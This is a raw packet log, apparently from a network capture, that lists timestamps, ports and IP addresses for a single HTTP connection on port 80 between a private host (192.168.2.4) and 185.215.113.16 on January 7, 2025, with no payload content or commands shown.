Jan 7, 2025 10:08:21.266825914 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.266830921 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.266848087 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.266861916 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.266872883 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.266874075 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.266907930 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.266918898 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.266922951 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267023087 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267035007 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267045975 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267055988 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267066956 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.267079115 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.267086029 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267096043 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.267112017 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267122030 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267159939 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.267275095 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267286062 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267297029 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267307043 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267328024 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.267332077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267344952 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267350912 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.267354965 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267365932 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267393112 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.267508030 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267534018 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267543077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267546892 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.267550945 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267580986 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.267606020 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267616987 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267646074 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.267724991 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267735958 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267745972 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267754078 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267766953 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267772913 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.267780066 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267790079 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267800093 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.267808914 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.267843962 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.268178940 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268239975 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268265963 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268275976 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268281937 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.268311024 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.268312931 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268326044 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268366098 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.268389940 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268402100 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268439054 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.268471003 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268481970 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268496037 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268518925 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.268553019 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.268629074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268639088 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268649101 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268655062 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268663883 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268711090 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.268753052 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268763065 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268774033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268785954 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268794060 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.268810987 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.268821001 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.268861055 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.268997908 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.269025087 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.269035101 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.269062996 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.269078970 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.269079924 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.269093990 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.269984007 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270011902 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270020962 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270031929 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270040035 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.270062923 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.270085096 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270123959 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.270133972 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270145893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270162106 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270190001 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.270220041 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270257950 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.270296097 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270308018 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270323992 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270334959 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270344019 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.270370960 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.270431042 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270442963 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270453930 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270463943 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270474911 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270487070 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.270514965 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.270560980 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270571947 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270581961 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270598888 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270606041 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.270611048 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270622969 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270623922 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.270646095 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.270723104 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.270765066 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.318598986 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.318613052 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.318661928 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.318922043 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.318932056 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.318948030 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.318957090 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.318981886 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.318994045 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.391838074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.391850948 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.391892910 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.391908884 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.391920090 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.391957998 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.391958952 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.391971111 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.391987085 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.391988039 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392011881 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392039061 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392057896 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392077923 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392086029 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392127037 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392144918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392155886 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392184019 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392194033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392205954 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392235041 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392302990 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392313957 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392327070 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392337084 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392343044 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392357111 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392362118 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392369986 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392398119 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392409086 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392411947 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392421007 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392432928 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392437935 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392458916 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392468929 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392505884 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392508984 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392517090 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392565966 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392577887 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392607927 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392618895 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392636061 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392659903 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392671108 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392682076 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392699957 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392712116 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392745018 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392755985 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392765999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392777920 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392796040 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392818928 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.392832994 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392843962 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.392883062 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.393001080 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393013000 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393024921 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393034935 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393054962 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.393066883 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.393258095 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393274069 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393285036 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393296003 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393313885 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.393331051 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.393371105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393382072 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393420935 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.393482924 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393495083 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393507957 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393532038 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.393552065 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393563032 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393585920 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393591881 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.393598080 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393610001 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393620968 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393641949 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393661022 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.393683910 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.393683910 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.393706083 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393716097 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393726110 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393737078 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.393752098 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.393779039 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.393796921 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.394161940 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.394171953 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.394182920 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.394213915 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.394227028 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.394937038 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.394948959 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.394961119 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.394993067 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.395020008 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395032883 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395044088 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395059109 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.395059109 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395086050 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.395123005 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395134926 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395152092 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395164967 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395173073 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.395184994 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395189047 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.395198107 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395210028 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395219088 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395234108 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.395256042 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.395359039 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395370007 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395375013 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395385027 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395396948 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395409107 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395414114 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.395421982 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395432949 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395442009 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.395462990 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.395467043 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395478010 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395488977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395515919 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.395519018 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395529985 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.395536900 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.395565033 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.400619030 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.444133997 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.444148064 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.444163084 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.444278955 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.516951084 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.516971111 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.516979933 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517016888 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517028093 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517051935 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.517085075 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517097950 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517101049 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.517101049 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.517119884 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517149925 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.517172098 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517183065 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517191887 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517203093 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517229080 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.517297029 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.517472982 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517483950 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517493963 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517504930 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517513990 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517524004 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.517565966 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517576933 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517582893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517590046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517596960 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.517669916 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517677069 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.517682076 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517693043 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517738104 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517755985 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517765999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517765999 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.517806053 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517817020 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517832041 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.517863035 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517874002 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517889023 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.517919064 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517930984 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517940044 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.517947912 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.517967939 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.518009901 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518021107 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518032074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518059969 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.518085957 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518096924 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518106937 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.518112898 CET	49884	80	192.168.2.4	185.215.113.16
